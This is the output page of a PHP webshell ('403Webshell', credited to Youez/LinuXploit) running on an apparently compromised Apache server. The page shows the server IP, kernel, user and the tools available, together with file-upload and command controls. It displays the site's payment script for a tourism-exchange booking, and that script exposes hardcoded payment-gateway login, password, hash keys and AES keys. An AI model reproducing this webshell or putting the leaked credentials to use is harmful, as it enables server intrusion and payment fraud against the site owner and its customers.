403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/b2bzend/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/b2bzend/tourism-exchange-payment-step.php
<?php

require_once 'cronjob/init.php';
error_reporting(E_ALL);
$TblAgency = new Travel_Model_TblAgency();
$crmcustomerObj = new Travel_Model_CRM_Customer();
$crmagencyleadaccountObj = new Travel_Model_CRM_AgencyLeadAccount();
$agencycustomerObj = new Travel_Model_CRM_AgencyCustomer();
$paymentMdl = new Payment_Model_Payment();
$resultArr = array();
if ($_POST) {
    $ru = "https://globaltravelexchange.com/tourism-exchange-return.php";
    $ATOMPAYMENTURL = "https://payment.atomtech.in/paynetz/epi/fts";
    $ATOMLOGIN = "539504";
    $ATOMPASS = "f866f584";
    $ATOMPRODID = "TIA";
    $REQHASHKEY = "01517d6fdafd323898";
    $RESPHASHKEY = "a045d430f81b2094b4";
    $AESREQUESTKEY = "EC44A04781B198676F4F86252AC112BC";
    $AESREQUESTIV = "EC44A04781B198676F4F86252AC112BC";
    $AESRESPONSEKEY = "5757820D5E37D1A73E3DC53DC386B9D2";
    $AESRESPONSEIV = "5757820D5E37D1A73E3DC53DC386B9D2";
    $paymentMdl = new Payment_Model_Payment();
    $txncurr = trim("INR");
    $txnid = isset($_POST['txnid']) ? trim($_POST['txnid']) : '';
    $fullName = (isset($_POST['FullName']) && $_POST['FullName'] != '') ? trim($_POST['FullName']) : '';
    $EmailId = isset($_POST['Email']) ? trim($_POST['Email']) : '';
    $MobileNo = isset($_POST['Phone']) ? trim($_POST['Phone']) : '';
    $Organization = isset($_POST['Organization']) ? $_POST['Organization'] : '';
    $DietaryRestrictions = isset($_POST['DietaryRestrictions']) ? $_POST['DietaryRestrictions'] : '';
    $TIAMembership = isset($_POST['TIAMembership']) ? trim($_POST['TIAMembership']) : 'No';
    $SingleOccupancy = isset($_POST['SingleOccupancy']) ? (int) $_POST['SingleOccupancy'] : 0;
    $DoubleOccupancy = isset($_POST['DoubleOccupancy']) ? (int) $_POST['DoubleOccupancy'] : 0;
    $DoubleOccupancyCost = $SingleOccupancyCost = $amount = 0;

    if ($TIAMembership == 'Yes') {
        $SingleOccupancyCost = "19000";
        $DoubleOccupancyCost = "11000";
    } else {
        $SingleOccupancyCost = "24000";
        $DoubleOccupancyCost = "15000";
    }
    if ($SingleOccupancy > 0) {
        $amount += $SingleOccupancy * $SingleOccupancyCost;
    }
    if ($DoubleOccupancy > 0) {
        $amount += $DoubleOccupancyCost * $DoubleOccupancy;
    }

    $amount = round(((float) $amount + ((float) $amount * 18) / 100),2);

    $AgencySysId = 21;
    $companyName = $AgencySysId;
    $login = trim($ATOMLOGIN);
    $pass = trim($ATOMPASS);
    $ttype = trim("NBFundTransfer");
    $prodid = trim($ATOMPRODID);
    $signatureVal = $login . $pass . $ttype . $prodid . $txnid . $amount . $txncurr;
    $signature = hash_hmac("sha512", $signatureVal, $REQHASHKEY, false);
    $datenow = date("d/m/Y h:m:s");
    $modifiedDate = str_replace(" ", "%20", $datenow);
    $postFields = "";
    $postFields .= "&login=$login";
    $postFields .= "&pass=$pass";
    $postFields .= "&ttype=$ttype";
    $postFields .= "&prodid=$prodid";
    $postFields .= "&amt=$amount";
    $postFields .= "&txncurr=$txncurr";
    $postFields .= "&txnscamt=0";
    $postFields .= "&signature=$signature";
    $postFields .= "&clientcode=" . urlencode(base64_encode($AgencySysId));
    $postFields .= "&txnid=" . $txnid;
    $postFields .= "&date=" . $modifiedDate;
    $postFields .= "&custacc=123456789";
    $postFields .= "&udf1=$fullName";
    $postFields .= "&udf2=$EmailId";
    $postFields .= "&udf3=$MobileNo";
    $postFields .= "&udf8=$DietaryRestrictions";
    $postFields .= "&udf4=$Organization";
    $postFields .= "&udf5=$SingleOccupancy";
    $postFields .= "&udf6=$DoubleOccupancy";
    $postFields .= "&udf9=$TIAMembership";
    $postFields .= "&ru=$ru";
    $postString = substr($postFields, 1);
    $encryptedData = new Travel_Model_AtomAES();
    $encryptedVal = strtoupper($encryptedData->encrypt($postString, $AESREQUESTKEY, $AESREQUESTIV));
    $sendUrl = $ATOMPAYMENTURL . "?login=$login&encdata=" . $encryptedVal . "\n";
    header("Location: " . $sendUrl);
    exit;
} else {
    echo "Please use post method";
    exit;
}

function sanitize_data($input_data) {
    $searchArr = array("document", "write", "alert", "%", "$", ";", "+", "|", "#", "<", ">", "\'");
    $input_data = str_replace("script", "", $input_data);
    $input_data = str_replace("iframe", "", $input_data);
    $input_data = str_replace($searchArr, "", $input_data);
    return htmlentities(stripslashes($input_data), ENT_QUOTES);
}

Youez - 2016 - github.com/yon3zu
LinuXploit